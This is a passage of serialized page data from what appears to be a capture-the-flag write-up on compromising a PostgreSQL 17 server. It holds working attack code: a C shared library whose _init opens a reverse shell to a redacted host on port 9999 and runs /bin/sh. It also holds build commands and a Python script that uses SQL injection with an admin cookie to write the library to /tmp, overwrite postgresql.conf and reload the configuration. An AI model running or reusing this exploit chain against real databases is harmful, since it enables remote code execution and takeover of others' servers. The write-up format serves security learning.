74],{"type":38,"value":9102},{"type":33,"tag":128,"props":9176,"children":9177},{"style":140},[9178],{"type":38,"value":9179},"stdlib.h",{"type":33,"tag":128,"props":9181,"children":9182},{"style":676},[9183],{"type
":38,"value":6097},{"type":33,"tag":128,"props":9185,"children":9186},{"class":130,"line":804},[9187,9191,9195,9199,9204],{"type":33,"tag":128,"props":9188,"children":9189},{"style":312},[9190],{"type":38,"value":9092},{"type":33,"tag":128,"props":9192,"children":9193},{"style":1576},[9194],{"type":38,"value":9097},{"type":33,"tag":128,"props":9196,"children":9197},{"style":676},[9198],{"type":38,"value":9102},{"type":33,"tag":128,"props":9200,"children":9201},{"style":140},[9202],{"type":38,"value":9203},"unistd.h",{"type":33,"tag":128,"props":9205,"children":9206},{"style":676},[9207],{"type":38,"value":6097},{"type":33,"tag":128,"props":9209,"children":9210},{"class":130,"line":839},[9211,9215,9219,9223,9228],{"type":33,"tag":128,"props":9212,"children":9213},{"style":312},[9214],{"type":38,"value":9092},{"type":33,"tag":128,"props":9216,"children":9217},{"style":1576},[9218],{"type":38,"value":9097},{"type":33,"tag":128,"props":9220,"children":9221},{"style":676},[9222],{"type":38,"value":9102},{"type":33,"tag":128,"props":9224,"children":9225},{"style":140},[9226],{"type":38,"value":9227},"netinet/in.h",{"type":33,"tag":128,"props":9229,"children":9230},{"style":676},[9231],{"type":38,"value":6097},{"type":33,"tag":128,"props":9233,"children":9234},{"class":130,"line":848},[9235,9239,9243,9247,9252],{"type":33,"tag":128,"props":9236,"children":9237},{"style":312},[9238],{"type":38,"value":9092},{"type":33,"tag":128,"props":9240,"children":9241},{"style":1576},[9242],{"type":38,"value":9097},{"type":33,"tag":128,"props":9244,"children":9245},{"style":676},[9246],{"type":38,"value":9102},{"type":33,"tag":128,"props":9248,"children":9249},{"style":140},[9250],{"type":38,"value":9251},"arpa/inet.h",{"type":33,"tag":128,"props":9253,"children":9254},{"style":676},[9255],{"type":38,"value":6097},{"type":33,"tag":128,"props":9257,"children":9258},{"class":130,"line":976},[9259,9263,9267,9271,9276],{"type":33,"tag":128,"props":9260,"children":9261},{"style":312},[9262]
,{"type":38,"value":9092},{"type":33,"tag":128,"props":9264,"children":9265},{"style":1576},[9266],{"type":38,"value":9097},{"type":33,"tag":128,"props":9268,"children":9269},{"style":676},[9270],{"type":38,"value":679},{"type":33,"tag":128,"props":9272,"children":9273},{"style":140},[9274],{"type":38,"value":9275},"postgres.h",{"type":33,"tag":128,"props":9277,"children":9278},{"style":676},[9279],{"type":38,"value":836},{"type":33,"tag":128,"props":9281,"children":9282},{"class":130,"line":988},[9283,9287,9291,9295,9300],{"type":33,"tag":128,"props":9284,"children":9285},{"style":312},[9286],{"type":38,"value":9092},{"type":33,"tag":128,"props":9288,"children":9289},{"style":1576},[9290],{"type":38,"value":9097},{"type":33,"tag":128,"props":9292,"children":9293},{"style":676},[9294],{"type":38,"value":679},{"type":33,"tag":128,"props":9296,"children":9297},{"style":140},[9298],{"type":38,"value":9299},"fmgr.h",{"type":33,"tag":128,"props":9301,"children":9302},{"style":676},[9303],{"type":38,"value":836},{"type":33,"tag":128,"props":9305,"children":9306},{"class":130,"line":1001},[9307],{"type":33,"tag":128,"props":9308,"children":9309},{"emptyLinePlaceholder":896},[9310],{"type":38,"value":899},{"type":33,"tag":128,"props":9312,"children":9313},{"class":130,"line":1014},[9314,9318,9323],{"type":33,"tag":128,"props":9315,"children":9316},{"style":312},[9317],{"type":38,"value":9092},{"type":33,"tag":128,"props":9319,"children":9320},{"style":1576},[9321],{"type":38,"value":9322},"ifdef",{"type":33,"tag":128,"props":9324,"children":9325},{"style":135},[9326],{"type":38,"value":9327}," 
PG_MODULE_MAGIC\n",{"type":33,"tag":128,"props":9329,"children":9330},{"class":130,"line":1026},[9331,9336],{"type":33,"tag":128,"props":9332,"children":9333},{"style":323},[9334],{"type":38,"value":9335},"PG_MODULE_MAGIC",{"type":33,"tag":128,"props":9337,"children":9338},{"style":312},[9339],{"type":38,"value":5676},{"type":33,"tag":128,"props":9341,"children":9342},{"class":130,"line":1038},[9343,9347],{"type":33,"tag":128,"props":9344,"children":9345},{"style":312},[9346],{"type":38,"value":9092},{"type":33,"tag":128,"props":9348,"children":9349},{"style":1576},[9350],{"type":38,"value":9351},"endif\n",{"type":33,"tag":128,"props":9353,"children":9354},{"class":130,"line":1051},[9355],{"type":33,"tag":128,"props":9356,"children":9357},{"emptyLinePlaceholder":896},[9358],{"type":38,"value":899},{"type":33,"tag":128,"props":9360,"children":9361},{"class":130,"line":1063},[9362,9367,9372,9377],{"type":33,"tag":128,"props":9363,"children":9364},{"style":300},[9365],{"type":38,"value":9366},"void",{"type":33,"tag":128,"props":9368,"children":9369},{"style":135},[9370],{"type":38,"value":9371}," _init",{"type":33,"tag":128,"props":9373,"children":9374},{"style":312},[9375],{"type":38,"value":9376},"()",{"type":33,"tag":128,"props":9378,"children":9379},{"style":312},[9380],{"type":38,"value":762},{"type":33,"tag":128,"props":9382,"children":9383},{"class":130,"line":1076},[9384],{"type":33,"tag":128,"props":9385,"children":9386},{"style":5541},[9387],{"type":38,"value":9388},"    /*\n",{"type":33,"tag":128,"props":9390,"children":9391},{"class":130,"line":1089},[9392],{"type":33,"tag":128,"props":9393,"children":9394},{"style":5541},[9395],{"type":38,"value":9396},"        code taken from https://www.revshells.com/\n",{"type":33,"tag":128,"props":9398,"children":9399},{"class":130,"line":1101},[9400],{"type":33,"tag":128,"props":9401,"children":9402},{"style":5541},[9403],{"type":38,"value":9404},"    
*/\n",{"type":33,"tag":128,"props":9406,"children":9407},{"class":130,"line":1114},[9408],{"type":33,"tag":128,"props":9409,"children":9410},{"emptyLinePlaceholder":896},[9411],{"type":38,"value":899},{"type":33,"tag":128,"props":9413,"children":9414},{"class":130,"line":1127},[9415,9420,9425,9429,9434],{"type":33,"tag":128,"props":9416,"children":9417},{"style":300},[9418],{"type":38,"value":9419},"    int",{"type":33,"tag":128,"props":9421,"children":9422},{"style":323},[9423],{"type":38,"value":9424}," port ",{"type":33,"tag":128,"props":9426,"children":9427},{"style":312},[9428],{"type":38,"value":315},{"type":33,"tag":128,"props":9430,"children":9431},{"style":523},[9432],{"type":38,"value":9433}," 9999",{"type":33,"tag":128,"props":9435,"children":9436},{"style":312},[9437],{"type":38,"value":5676},{"type":33,"tag":128,"props":9439,"children":9440},{"class":130,"line":1139},[9441,9446,9451],{"type":33,"tag":128,"props":9442,"children":9443},{"style":300},[9444],{"type":38,"value":9445},"    struct",{"type":33,"tag":128,"props":9447,"children":9448},{"style":323},[9449],{"type":38,"value":9450}," sockaddr_in revsockaddr",{"type":33,"tag":128,"props":9452,"children":9453},{"style":312},[9454],{"type":38,"value":5676},{"type":33,"tag":128,"props":9456,"children":9457},{"class":130,"line":1152},[9458],{"type":33,"tag":128,"props":9459,"children":9460},{"emptyLinePlaceholder":896},[9461],{"type":38,"value":899},{"type":33,"tag":128,"props":9463,"children":9464},{"class":130,"line":1165},[9465,9469,9474,9478,9483,9487,9492,9496,9501,9505,9510],{"type":33,"tag":128,"props":9466,"children":9467},{"style":300},[9468],{"type":38,"value":9419},{"type":33,"tag":128,"props":9470,"children":9471},{"style":323},[9472],{"type":38,"value":9473}," sockt ",{"type":33,"tag":128,"props":9475,"children":9476},{"style":312},[9477],{"type":38,"value":315},{"type":33,"tag":128,"props":9479,"children":9480},{"style":135},[9481],{"type":38,"value":9482}," 
socket",{"type":33,"tag":128,"props":9484,"children":9485},{"style":312},[9486],{"type":38,"value":5566},{"type":33,"tag":128,"props":9488,"children":9489},{"style":323},[9490],{"type":38,"value":9491},"AF_INET",{"type":33,"tag":128,"props":9493,"children":9494},{"style":312},[9495],{"type":38,"value":5584},{"type":33,"tag":128,"props":9497,"children":9498},{"style":323},[9499],{"type":38,"value":9500}," SOCK_STREAM",{"type":33,"tag":128,"props":9502,"children":9503},{"style":312},[9504],{"type":38,"value":5584},{"type":33,"tag":128,"props":9506,"children":9507},{"style":523},[9508],{"type":38,"value":9509}," 0",{"type":33,"tag":128,"props":9511,"children":9512},{"style":312},[9513],{"type":38,"value":5815},{"type":33,"tag":128,"props":9515,"children":9516},{"class":130,"line":1177},[9517,9522,9526,9531,9535,9540],{"type":33,"tag":128,"props":9518,"children":9519},{"style":306},[9520],{"type":38,"value":9521},"    revsockaddr",{"type":33,"tag":128,"props":9523,"children":9524},{"style":312},[9525],{"type":38,"value":215},{"type":33,"tag":128,"props":9527,"children":9528},{"style":306},[9529],{"type":38,"value":9530},"sin_family",{"type":33,"tag":128,"props":9532,"children":9533},{"style":312},[9534],{"type":38,"value":5657},{"type":33,"tag":128,"props":9536,"children":9537},{"style":323},[9538],{"type":38,"value":9539}," 
AF_INET",{"type":33,"tag":128,"props":9541,"children":9542},{"style":312},[9543],{"type":38,"value":5676},{"type":33,"tag":128,"props":9545,"children":9546},{"class":130,"line":1189},[9547,9551,9555,9560,9564,9569,9573,9578],{"type":33,"tag":128,"props":9548,"children":9549},{"style":306},[9550],{"type":38,"value":9521},{"type":33,"tag":128,"props":9552,"children":9553},{"style":312},[9554],{"type":38,"value":215},{"type":33,"tag":128,"props":9556,"children":9557},{"style":306},[9558],{"type":38,"value":9559},"sin_port",{"type":33,"tag":128,"props":9561,"children":9562},{"style":312},[9563],{"type":38,"value":5657},{"type":33,"tag":128,"props":9565,"children":9566},{"style":135},[9567],{"type":38,"value":9568}," htons",{"type":33,"tag":128,"props":9570,"children":9571},{"style":312},[9572],{"type":38,"value":5566},{"type":33,"tag":128,"props":9574,"children":9575},{"style":323},[9576],{"type":38,"value":9577},"port",{"type":33,"tag":128,"props":9579,"children":9580},{"style":312},[9581],{"type":38,"value":5815},{"type":33,"tag":128,"props":9583,"children":9584},{"class":130,"line":1202},[9585,9589,9593,9598,9602,9607,9611,9616,9620,9624,9629,9633],{"type":33,"tag":128,"props":9586,"children":9587},{"style":306},[9588],{"type":38,"value":9521},{"type":33,"tag":128,"props":9590,"children":9591},{"style":312},[9592],{"type":38,"value":215},{"type":33,"tag":128,"props":9594,"children":9595},{"style":306},[9596],{"type":38,"value":9597},"sin_addr",{"type":33,"tag":128,"props":9599,"children":9600},{"style":312},[9601],{"type":38,"value":215},{"type":33,"tag":128,"props":9603,"children":9604},{"style":306},[9605],{"type":38,"value":9606},"s_addr",{"type":33,"tag":128,"props":9608,"children":9609},{"style":312},[9610],{"type":38,"value":5657},{"type":33,"tag":128,"props":9612,"children":9613},{"style":135},[9614],{"type":38,"value":9615}," 
inet_addr",{"type":33,"tag":128,"props":9617,"children":9618},{"style":312},[9619],{"type":38,"value":5566},{"type":33,"tag":128,"props":9621,"children":9622},{"style":676},[9623],{"type":38,"value":669},{"type":33,"tag":128,"props":9625,"children":9626},{"style":140},[9627],{"type":38,"value":9628},"[REDACTED]",{"type":33,"tag":128,"props":9630,"children":9631},{"style":676},[9632],{"type":38,"value":669},{"type":33,"tag":128,"props":9634,"children":9635},{"style":312},[9636],{"type":38,"value":5815},{"type":33,"tag":128,"props":9638,"children":9639},{"class":130,"line":1214},[9640],{"type":33,"tag":128,"props":9641,"children":9642},{"emptyLinePlaceholder":896},[9643],{"type":38,"value":899},{"type":33,"tag":128,"props":9645,"children":9646},{"class":130,"line":1226},[9647,9652,9656,9661,9665,9669,9674,9679,9684,9688,9693,9698],{"type":33,"tag":128,"props":9648,"children":9649},{"style":135},[9650],{"type":38,"value":9651},"    connect",{"type":33,"tag":128,"props":9653,"children":9654},{"style":312},[9655],{"type":38,"value":5566},{"type":33,"tag":128,"props":9657,"children":9658},{"style":323},[9659],{"type":38,"value":9660},"sockt",{"type":33,"tag":128,"props":9662,"children":9663},{"style":312},[9664],{"type":38,"value":5584},{"type":33,"tag":128,"props":9666,"children":9667},{"style":312},[9668],{"type":38,"value":2852},{"type":33,"tag":128,"props":9670,"children":9671},{"style":300},[9672],{"type":38,"value":9673},"struct",{"type":33,"tag":128,"props":9675,"children":9676},{"style":323},[9677],{"type":38,"value":9678}," sockaddr ",{"type":33,"tag":128,"props":9680,"children":9681},{"style":300},[9682],{"type":38,"value":9683},"*",{"type":33,"tag":128,"props":9685,"children":9686},{"style":312},[9687],{"type":38,"value":2966},{"type":33,"tag":128,"props":9689,"children":9690},{"style":300},[9691],{"type":38,"value":9692}," 
&",{"type":33,"tag":128,"props":9694,"children":9695},{"style":323},[9696],{"type":38,"value":9697},"revsockaddr",{"type":33,"tag":128,"props":9699,"children":9700},{"style":312},[9701],{"type":38,"value":693},{"type":33,"tag":128,"props":9703,"children":9704},{"class":130,"line":1239},[9705,9710,9714,9718],{"type":33,"tag":128,"props":9706,"children":9707},{"style":300},[9708],{"type":38,"value":9709},"    sizeof",{"type":33,"tag":128,"props":9711,"children":9712},{"style":312},[9713],{"type":38,"value":5566},{"type":33,"tag":128,"props":9715,"children":9716},{"style":323},[9717],{"type":38,"value":9697},{"type":33,"tag":128,"props":9719,"children":9720},{"style":312},[9721],{"type":38,"value":9722},"));\n",{"type":33,"tag":128,"props":9724,"children":9725},{"class":130,"line":1251},[9726,9731,9735,9739,9743,9747],{"type":33,"tag":128,"props":9727,"children":9728},{"style":135},[9729],{"type":38,"value":9730},"    dup2",{"type":33,"tag":128,"props":9732,"children":9733},{"style":312},[9734],{"type":38,"value":5566},{"type":33,"tag":128,"props":9736,"children":9737},{"style":323},[9738],{"type":38,"value":9660},{"type":33,"tag":128,"props":9740,"children":9741},{"style":312},[9742],{"type":38,"value":5584},{"type":33,"tag":128,"props":9744,"children":9745},{"style":523},[9746],{"type":38,"value":9509},{"type":33,"tag":128,"props":9748,"children":9749},{"style":312},[9750],{"type":38,"value":5815},{"type":33,"tag":128,"props":9752,"children":9753},{"class":130,"line":1263},[9754,9758,9762,9766,9770,9775],{"type":33,"tag":128,"props":9755,"children":9756},{"style":135},[9757],{"type":38,"value":9730},{"type":33,"tag":128,"props":9759,"children":9760},{"style":312},[9761],{"type":38,"value":5566},{"type":33,"tag":128,"props":9763,"children":9764},{"style":323},[9765],{"type":38,"value":9660},{"type":33,"tag":128,"props":9767,"children":9768},{"style":312},[9769],{"type":38,"value":5584},{"type":33,"tag":128,"props":9771,"children":9772},{"style":523},[9773],{"type":38,
"value":9774}," 1",{"type":33,"tag":128,"props":9776,"children":9777},{"style":312},[9778],{"type":38,"value":5815},{"type":33,"tag":128,"props":9780,"children":9781},{"class":130,"line":1276},[9782,9786,9790,9794,9798,9803],{"type":33,"tag":128,"props":9783,"children":9784},{"style":135},[9785],{"type":38,"value":9730},{"type":33,"tag":128,"props":9787,"children":9788},{"style":312},[9789],{"type":38,"value":5566},{"type":33,"tag":128,"props":9791,"children":9792},{"style":323},[9793],{"type":38,"value":9660},{"type":33,"tag":128,"props":9795,"children":9796},{"style":312},[9797],{"type":38,"value":5584},{"type":33,"tag":128,"props":9799,"children":9800},{"style":523},[9801],{"type":38,"value":9802}," 2",{"type":33,"tag":128,"props":9804,"children":9805},{"style":312},[9806],{"type":38,"value":5815},{"type":33,"tag":128,"props":9808,"children":9809},{"class":130,"line":1288},[9810],{"type":33,"tag":128,"props":9811,"children":9812},{"emptyLinePlaceholder":896},[9813],{"type":38,"value":899},{"type":33,"tag":128,"props":9815,"children":9816},{"class":130,"line":1300},[9817,9822,9827,9832,9837,9842,9846,9850,9854,9859,9863,9867,9872],{"type":33,"tag":128,"props":9818,"children":9819},{"style":300},[9820],{"type":38,"value":9821},"    char",{"type":33,"tag":128,"props":9823,"children":9824},{"style":300},[9825],{"type":38,"value":9826}," *",{"type":33,"tag":128,"props":9828,"children":9829},{"style":300},[9830],{"type":38,"value":9831}," const",{"type":33,"tag":128,"props":9833,"children":9834},{"style":323},[9835],{"type":38,"value":9836}," 
argv",{"type":33,"tag":128,"props":9838,"children":9839},{"style":300},[9840],{"type":38,"value":9841},"[]",{"type":33,"tag":128,"props":9843,"children":9844},{"style":312},[9845],{"type":38,"value":5657},{"type":33,"tag":128,"props":9847,"children":9848},{"style":312},[9849],{"type":38,"value":5642},{"type":33,"tag":128,"props":9851,"children":9852},{"style":676},[9853],{"type":38,"value":669},{"type":33,"tag":128,"props":9855,"children":9856},{"style":140},[9857],{"type":38,"value":9858},"/bin/sh",{"type":33,"tag":128,"props":9860,"children":9861},{"style":676},[9862],{"type":38,"value":669},{"type":33,"tag":128,"props":9864,"children":9865},{"style":312},[9866],{"type":38,"value":5584},{"type":33,"tag":128,"props":9868,"children":9869},{"style":1576},[9870],{"type":38,"value":9871}," NULL",{"type":33,"tag":128,"props":9873,"children":9874},{"style":312},[9875],{"type":38,"value":9876},"};\n",{"type":33,"tag":128,"props":9878,"children":9879},{"class":130,"line":1313},[9880,9885,9889,9893,9897,9901,9905,9909,9913,9917],{"type":33,"tag":128,"props":9881,"children":9882},{"style":135},[9883],{"type":38,"value":9884},"    
execve",{"type":33,"tag":128,"props":9886,"children":9887},{"style":312},[9888],{"type":38,"value":5566},{"type":33,"tag":128,"props":9890,"children":9891},{"style":676},[9892],{"type":38,"value":669},{"type":33,"tag":128,"props":9894,"children":9895},{"style":140},[9896],{"type":38,"value":9858},{"type":33,"tag":128,"props":9898,"children":9899},{"style":676},[9900],{"type":38,"value":669},{"type":33,"tag":128,"props":9902,"children":9903},{"style":312},[9904],{"type":38,"value":5584},{"type":33,"tag":128,"props":9906,"children":9907},{"style":323},[9908],{"type":38,"value":9836},{"type":33,"tag":128,"props":9910,"children":9911},{"style":312},[9912],{"type":38,"value":5584},{"type":33,"tag":128,"props":9914,"children":9915},{"style":1576},[9916],{"type":38,"value":9871},{"type":33,"tag":128,"props":9918,"children":9919},{"style":312},[9920],{"type":38,"value":5815},{"type":33,"tag":128,"props":9922,"children":9923},{"class":130,"line":1327},[9924],{"type":33,"tag":128,"props":9925,"children":9926},{"style":312},[9927],{"type":38,"value":854},{"type":33,"tag":47,"props":9929,"children":9930},{},[9931,9933,9939],{"type":38,"value":9932},"To compile our library, it's best to be in an environment identical to the challenge, following the same PostgreSQL version, which is the latest (version 17). 
I used Docker to have a clean environment, it's important to install ",{"type":33,"tag":105,"props":9934,"children":9936},{"className":9935},[],[9937],{"type":38,"value":9938},"postgresql-server-dev-17",{"type":38,"value":9940}," which will provide the postgres.h library that is essential for compiling our library.",{"type":33,"tag":114,"props":9942,"children":9943},{"lang":116},[9944],{"type":33,"tag":119,"props":9945,"children":9947},{"className":121,"code":9946,"language":116,"meta":8,"style":8},"$> docker pull postgres\n$> docker run -it 76e3e031d245 /bin/bash\n$> apt update && apt install -y posgresql-server-dev-17 gcc vim\n$> gcc \\\n-I$(pg_config --includedir-server) \\\n-shared \\\n-fPIC \\\n-nostartfiles \\\n-o payload.so \\\npayload.c\n$> cat payload.so | base64 -w > payload.b64\n",[9948],{"type":33,"tag":105,"props":9949,"children":9950},{"__ignoreMap":8},[9951,9977,10012,10068,10088,10111,10123,10135,10147,10163,10171],{"type":33,"tag":128,"props":9952,"children":9953},{"class":130,"line":131},[9954,9958,9962,9967,9972],{"type":33,"tag":128,"props":9955,"children":9956},{"style":135},[9957],{"type":38,"value":3651},{"type":33,"tag":128,"props":9959,"children":9960},{"style":323},[9961],{"type":38,"value":3656},{"type":33,"tag":128,"props":9963,"children":9964},{"style":140},[9965],{"type":38,"value":9966},"docker",{"type":33,"tag":128,"props":9968,"children":9969},{"style":140},[9970],{"type":38,"value":9971}," pull",{"type":33,"tag":128,"props":9973,"children":9974},{"style":140},[9975],{"type":38,"value":9976}," 
postgres\n",{"type":33,"tag":128,"props":9978,"children":9979},{"class":130,"line":362},[9980,9984,9988,9992,9997,10002,10007],{"type":33,"tag":128,"props":9981,"children":9982},{"style":135},[9983],{"type":38,"value":3651},{"type":33,"tag":128,"props":9985,"children":9986},{"style":323},[9987],{"type":38,"value":3656},{"type":33,"tag":128,"props":9989,"children":9990},{"style":140},[9991],{"type":38,"value":9966},{"type":33,"tag":128,"props":9993,"children":9994},{"style":140},[9995],{"type":38,"value":9996}," run",{"type":33,"tag":128,"props":9998,"children":9999},{"style":151},[10000],{"type":38,"value":10001}," -it",{"type":33,"tag":128,"props":10003,"children":10004},{"style":140},[10005],{"type":38,"value":10006}," 76e3e031d245",{"type":33,"tag":128,"props":10008,"children":10009},{"style":140},[10010],{"type":38,"value":10011}," /bin/bash\n",{"type":33,"tag":128,"props":10013,"children":10014},{"class":130,"line":403},[10015,10019,10023,10028,10033,10038,10043,10048,10053,10058,10063],{"type":33,"tag":128,"props":10016,"children":10017},{"style":135},[10018],{"type":38,"value":3651},{"type":33,"tag":128,"props":10020,"children":10021},{"style":323},[10022],{"type":38,"value":3656},{"type":33,"tag":128,"props":10024,"children":10025},{"style":140},[10026],{"type":38,"value":10027},"apt",{"type":33,"tag":128,"props":10029,"children":10030},{"style":140},[10031],{"type":38,"value":10032}," update",{"type":33,"tag":128,"props":10034,"children":10035},{"style":312},[10036],{"type":38,"value":10037}," &&",{"type":33,"tag":128,"props":10039,"children":10040},{"style":135},[10041],{"type":38,"value":10042}," apt",{"type":33,"tag":128,"props":10044,"children":10045},{"style":140},[10046],{"type":38,"value":10047}," install",{"type":33,"tag":128,"props":10049,"children":10050},{"style":151},[10051],{"type":38,"value":10052}," -y",{"type":33,"tag":128,"props":10054,"children":10055},{"style":140},[10056],{"type":38,"value":10057}," 
posgresql-server-dev-17",{"type":33,"tag":128,"props":10059,"children":10060},{"style":140},[10061],{"type":38,"value":10062}," gcc",{"type":33,"tag":128,"props":10064,"children":10065},{"style":140},[10066],{"type":38,"value":10067}," vim\n",{"type":33,"tag":128,"props":10069,"children":10070},{"class":130,"line":739},[10071,10075,10079,10084],{"type":33,"tag":128,"props":10072,"children":10073},{"style":135},[10074],{"type":38,"value":3651},{"type":33,"tag":128,"props":10076,"children":10077},{"style":323},[10078],{"type":38,"value":3656},{"type":33,"tag":128,"props":10080,"children":10081},{"style":140},[10082],{"type":38,"value":10083},"gcc",{"type":33,"tag":128,"props":10085,"children":10086},{"style":151},[10087],{"type":38,"value":2720},{"type":33,"tag":128,"props":10089,"children":10090},{"class":130,"line":765},[10091,10096,10101,10106],{"type":33,"tag":128,"props":10092,"children":10093},{"style":323},[10094],{"type":38,"value":10095},"-I$(pg_config ",{"type":33,"tag":128,"props":10097,"children":10098},{"style":151},[10099],{"type":38,"value":10100},"--includedir-server",{"type":33,"tag":128,"props":10102,"children":10103},{"style":323},[10104],{"type":38,"value":10105},") ",{"type":33,"tag":128,"props":10107,"children":10108},{"style":151},[10109],{"type":38,"value":10110},"\\\n",{"type":33,"tag":128,"props":10112,"children":10113},{"class":130,"line":804},[10114,10119],{"type":33,"tag":128,"props":10115,"children":10116},{"style":135},[10117],{"type":38,"value":10118},"-shared",{"type":33,"tag":128,"props":10120,"children":10121},{"style":151},[10122],{"type":38,"value":2720},{"type":33,"tag":128,"props":10124,"children":10125},{"class":130,"line":839},[10126,10131],{"type":33,"tag":128,"props":10127,"children":10128},{"style":323},[10129],{"type":38,"value":10130},"-fPIC 
",{"type":33,"tag":128,"props":10132,"children":10133},{"style":151},[10134],{"type":38,"value":10110},{"type":33,"tag":128,"props":10136,"children":10137},{"class":130,"line":848},[10138,10143],{"type":33,"tag":128,"props":10139,"children":10140},{"style":323},[10141],{"type":38,"value":10142},"-nostartfiles ",{"type":33,"tag":128,"props":10144,"children":10145},{"style":151},[10146],{"type":38,"value":10110},{"type":33,"tag":128,"props":10148,"children":10149},{"class":130,"line":976},[10150,10155,10159],{"type":33,"tag":128,"props":10151,"children":10152},{"style":323},[10153],{"type":38,"value":10154},"-o ",{"type":33,"tag":128,"props":10156,"children":10157},{"style":140},[10158],{"type":38,"value":9042},{"type":33,"tag":128,"props":10160,"children":10161},{"style":151},[10162],{"type":38,"value":2720},{"type":33,"tag":128,"props":10164,"children":10165},{"class":130,"line":988},[10166],{"type":33,"tag":128,"props":10167,"children":10168},{"style":323},[10169],{"type":38,"value":10170},"payload.c\n",{"type":33,"tag":128,"props":10172,"children":10173},{"class":130,"line":1001},[10174,10178,10182,10186,10191,10196,10201,10206,10210],{"type":33,"tag":128,"props":10175,"children":10176},{"style":135},[10177],{"type":38,"value":3651},{"type":33,"tag":128,"props":10179,"children":10180},{"style":323},[10181],{"type":38,"value":3656},{"type":33,"tag":128,"props":10183,"children":10184},{"style":140},[10185],{"type":38,"value":2467},{"type":33,"tag":128,"props":10187,"children":10188},{"style":140},[10189],{"type":38,"value":10190}," payload.so",{"type":33,"tag":128,"props":10192,"children":10193},{"style":300},[10194],{"type":38,"value":10195}," |",{"type":33,"tag":128,"props":10197,"children":10198},{"style":135},[10199],{"type":38,"value":10200}," base64",{"type":33,"tag":128,"props":10202,"children":10203},{"style":151},[10204],{"type":38,"value":10205}," 
-w",{"type":33,"tag":128,"props":10207,"children":10208},{"style":300},[10209],{"type":38,"value":2472},{"type":33,"tag":128,"props":10211,"children":10212},{"style":140},[10213],{"type":38,"value":10214}," payload.b64\n",{"type":33,"tag":47,"props":10216,"children":10217},{},[10218],{"type":38,"value":10219},"Once our payload is compiled, we will encode it in base64.",{"type":33,"tag":47,"props":10221,"children":10222},{},[10223],{"type":38,"value":10224},"We will use a Python script that will automate the writing of files to the filesystem, the script will write the library to /tmp and overwrite the new library. Once everything is written, the configuration needs to be reloaded, for reasons unknown it is essential to reload the configuration multiple times to have an effect.",{"type":33,"tag":114,"props":10226,"children":10228},{"lang":10227},"python",[10229],{"type":33,"tag":119,"props":10230,"children":10233},{"className":10231,"code":10232,"language":10227,"meta":8,"style":8},"language-python shiki shiki-themes vitesse-dark","import requests\nimport base64\nimport random\n\n\nSESSION_COOKIE = 'connect.sid=\u003CADMIN_COOKIE>'\nBASE_URL = 'http://\u003CCHALLENGE_IP:PORT>/table'\nheaders = {\n    'Cookie': SESSION_COOKIE\n}\n\ndef get_randnum():\n    return random.randint(0, 31337*5)\n\ndef exec_payload(sql):\n    body = {\"tableName\": f\"users\\\" where 1=({sql})--\"}\n    res = requests.post(BASE_URL, headers=headers, json=body)\n    print(res.status_code)\n    \n\ndef file_to_base64(file_path):\n    with open(file_path, \"rb\") as file:\n        base64_encoded = base64.b64encode(file.read()).decode(\"utf-8\")\n    return base64_encoded\n\ndef read_base64file(file_path):\n    with open(file_path, \"r\") as file:\n        base64_content = file.read()\n    return base64_content\n\nif __name__ == \"__main__\":\n    # upload b64 so\n    payload = read_base64file(\"payload.b64\")\n    current_id = get_randnum()\n    \n    exec_payload(f\"SELECT 
lo_from_bytea({current_id}, decode('{payload}', 'base64'))\")\n    exec_payload(f\"SELECT lo_export({current_id}, '/tmp/payload.so')\")\n\n    # upload conf\n    conf = file_to_base64(\"conf\")\n    current_id = get_randnum()\n    \n    exec_payload(f\"SELECT lo_from_bytea({current_id}, decode('{conf}', 'base64'))\")\n    exec_payload(f\"SELECT lo_export({current_id}, '/var/lib/postgresql/data/postgresql.conf')\")\n\n    # reload conf\n    exec_payload(f\"SELECT pg_reload_conf()\")\n    exec_payload(f\"SELECT pg_reload_conf()\")\n    exec_payload(f\"SELECT pg_reload_conf()\")\n\n",[10234],{"type":33,"tag":105,"props":10235,"children":10236},{"__ignoreMap":8},[10237,10250,10262,10274,10281,10288,10314,10339,10355,10381,10388,10395,10413,10465,10472,10498,10571,10643,10673,10681,10688,10713,10768,10842,10854,10861,10885,10937,10965,10977,10984,11019,11027,11064,11084,11091,11153,11194,11202,11211,11248,11268,11276,11332,11373,11381,11390,11415,11439],{"type":33,"tag":128,"props":10238,"children":10239},{"class":130,"line":131},[10240,10245],{"type":33,"tag":128,"props":10241,"children":10242},{"style":1576},[10243],{"type":38,"value":10244},"import",{"type":33,"tag":128,"props":10246,"children":10247},{"style":323},[10248],{"type":38,"value":10249}," requests\n",{"type":33,"tag":128,"props":10251,"children":10252},{"class":130,"line":362},[10253,10257],{"type":33,"tag":128,"props":10254,"children":10255},{"style":1576},[10256],{"type":38,"value":10244},{"type":33,"tag":128,"props":10258,"children":10259},{"style":323},[10260],{"type":38,"value":10261}," base64\n",{"type":33,"tag":128,"props":10263,"children":10264},{"class":130,"line":403},[10265,10269],{"type":33,"tag":128,"props":10266,"children":10267},{"style":1576},[10268],{"type":38,"value":10244},{"type":33,"tag":128,"props":10270,"children":10271},{"style":323},[10272],{"type":38,"value":10273}," 
random\n",{"type":33,"tag":128,"props":10275,"children":10276},{"class":130,"line":739},[10277],{"type":33,"tag":128,"props":10278,"children":10279},{"emptyLinePlaceholder":896},[10280],{"type":38,"value":899},{"type":33,"tag":128,"props":10282,"children":10283},{"class":130,"line":765},[10284],{"type":33,"tag":128,"props":10285,"children":10286},{"emptyLinePlaceholder":896},[10287],{"type":38,"value":899},{"type":33,"tag":128,"props":10289,"children":10290},{"class":130,"line":804},[10291,10296,10300,10304,10309],{"type":33,"tag":128,"props":10292,"children":10293},{"style":151},[10294],{"type":38,"value":10295},"SESSION_COOKIE",{"type":33,"tag":128,"props":10297,"children":10298},{"style":312},[10299],{"type":38,"value":5657},{"type":33,"tag":128,"props":10301,"children":10302},{"style":676},[10303],{"type":38,"value":6739},{"type":33,"tag":128,"props":10305,"children":10306},{"style":140},[10307],{"type":38,"value":10308},"connect.sid=\u003CADMIN_COOKIE>",{"type":33,"tag":128,"props":10310,"children":10311},{"style":676},[10312],{"type":38,"value":10313},"'\n",{"type":33,"tag":128,"props":10315,"children":10316},{"class":130,"line":839},[10317,10322,10326,10330,10335],{"type":33,"tag":128,"props":10318,"children":10319},{"style":151},[10320],{"type":38,"value":10321},"BASE_URL",{"type":33,"tag":128,"props":10323,"children":10324},{"style":312},[10325],{"type":38,"value":5657},{"type":33,"tag":128,"props":10327,"children":10328},{"style":676},[10329],{"type":38,"value":6739},{"type":33,"tag":128,"props":10331,"children":10332},{"style":140},[10333],{"type":38,"value":10334},"http://\u003CCHALLENGE_IP:PO